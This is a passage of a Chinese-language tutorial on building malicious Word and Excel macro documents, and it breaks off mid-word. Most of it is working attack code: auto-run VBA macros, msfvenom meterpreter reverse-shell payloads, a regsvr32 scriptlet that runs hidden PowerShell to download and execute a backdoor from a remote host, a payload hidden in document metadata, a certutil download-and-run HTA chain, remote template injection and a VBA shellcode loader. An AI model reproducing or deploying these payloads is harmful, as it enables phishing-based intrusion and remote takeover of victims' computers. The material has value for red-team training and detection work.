Private Sub Document_Open()
MsgBox "wuhu haoye", vbOKOnly, "good word"
End Sub
保存后如果显示为未启用宏的文档,可以点击”否”按钮更改文件的保存类型。
然后键入ALT+F11切换编辑器到Word文档,这里就需要添加社工风格:
保存文档后即可看到在目录中的另一个docm文档,这就是生成的宏文档。
打开并启用宏后即可显示弹窗消息:
Metasploit生成VBA宏
通过执行以下命令使用Metasploit框架生成VBA宏:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 -e x86/shikata_ga_nai -f vba-psh > vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 381 (iteration=0)
x86/shikata_ga_nai chosen with final size 381
Payload size: 381 bytes
Final size of vba-psh file: 7590 bytes
Public alreadyLaunched As Integer
Private Sub Malware()
'
' ============================================
'
' Enter here your malware code here.
' It will be started on auto open surely.
'
' ============================================
MsgBox ("Here comes the malware!")
' ============================================
End Sub
Private Sub Launch()
If alreadyLaunched = True Then
Exit Sub
End If
Malware
SubstitutePage
alreadyLaunched = True
End Sub
Private Sub SubstitutePage()
'
' This routine will take the entire Document's contents,
' delete them and insert in their place contents defined in
' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName`
'
Dim doc As Word.Document
Dim firstPageRange As Range
Dim rng As Range
Dim autoTextTemplateName As String
' This is the name of the defined AutoText prepared in the document,
' to be inserted in place of previous contents.
autoTextTemplateName = "这是一个图文集"
Set firstPageRange = Word.ActiveDocument.Range
firstPageRange.Select
Selection.WholeStory
Selection.Delete Unit:=wdCharacter, Count:=1
Set doc = ActiveDocument
Set rng = doc.Sections(1).Range
doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True
doc.Save
End Sub
Sub AutoOpen()
' Becomes launched as first on MS Word
Launch
End Sub
Sub Document_Open()
' Becomes launched as second, another try, on MS Word
Launch
End Sub
Sub Auto_Open()
' Becomes launched as first on MS Excel
Launch
End Sub
Sub Workbook_Open()
' Becomes launched as second, another try, on MS Excel
Launch
End Sub
Regsvr32方法
通过在宏中引用regsvr32来下载文件进行交付。
首先编写sct文件:
<?XML version="1.0"?>
<scriptlet>
<registration progid="PqYOEI6w" classid="{057b64c8-1107-cda1-3d34-062978395f62}">
<script>
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("powershell.exe -nop -w hidden -c $r=new-object net.webclient;$r.proxy=[Net.WebRequest]::GetSystemWebProxy();$r.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $r.downloadstring('http://192.168.8.145/backdoor.file');", 0);
]]>
</script>
</registration>
</scriptlet>
其中backdoor.file文件是后门文件,带有powershell命令即可。
编写宏代码如下:
Private Sub Document_Open()
Test
End Sub
Private Sub DocumentOpen()
Test
End Sub
Private Sub Auto_Open()
Test
End Sub
Private Sub AutoOpen()
Test
End Sub
Private Sub Auto_Exec()
Test
End Sub
Private Sub Test()
Dim shell
Dim out
Set shell = VBA.CreateObject("WScript.Shell")
out = shell.Run("regsvr32 /u /n /s /i:http://192.168.8.145/vba.sct scrobj.dll", 0, False)
End Sub
Private Sub Workbook_Open()
Dim author As String
author = ActiveWorkbook.BuiltinDocumentProperties("Author")
Dim ws As Object
Set ws = CreateObject("WScript.Shell")
With ws.Exec("powershell.exe -nop -WindowStyle hidden -Command -")
.StdIn.WriteLine author
.StdIn.WriteBlankLines 1
.Terminate
End With
End Sub
然后我们使用Metasploit生成编码后的payload并将其放置到Author属性中即可:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.145 LPORT=4444 -f psh-cmd
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of psh-cmd file: 7111 bytes
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdA....
Sub DownloadAndExec()
Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP")
Dim bStrm: Set bStrm = CreateObject("Adodb.Stream")
xHttp.Open "GET", "https://192.168.8.145/encoded.crt", False
xHttp.Send
With bStrm
.Type = 1
.Open
.write xHttp.responseBody
.savetofile "encoded.crt", 2
End With
Shell ("cmd /c certutil -decode encoded.crt encoded.hta & start encoded.hta")
End Sub
远程模板注入
引用包含宏的模板文件来执行宏。
制作模板注入只需要将当前Word文档重命名为.zip后缀并解压,然后进入到word目录下的_rels目录,打开document.xml.rels文件并找到一个空闲的 Id 值,例如 rId10,然后在 Relationships 标签内添加一个新的 Relationship 标签即可:
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes
As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As
LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As
LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As
Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As
LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(shellcode array)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Function
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacr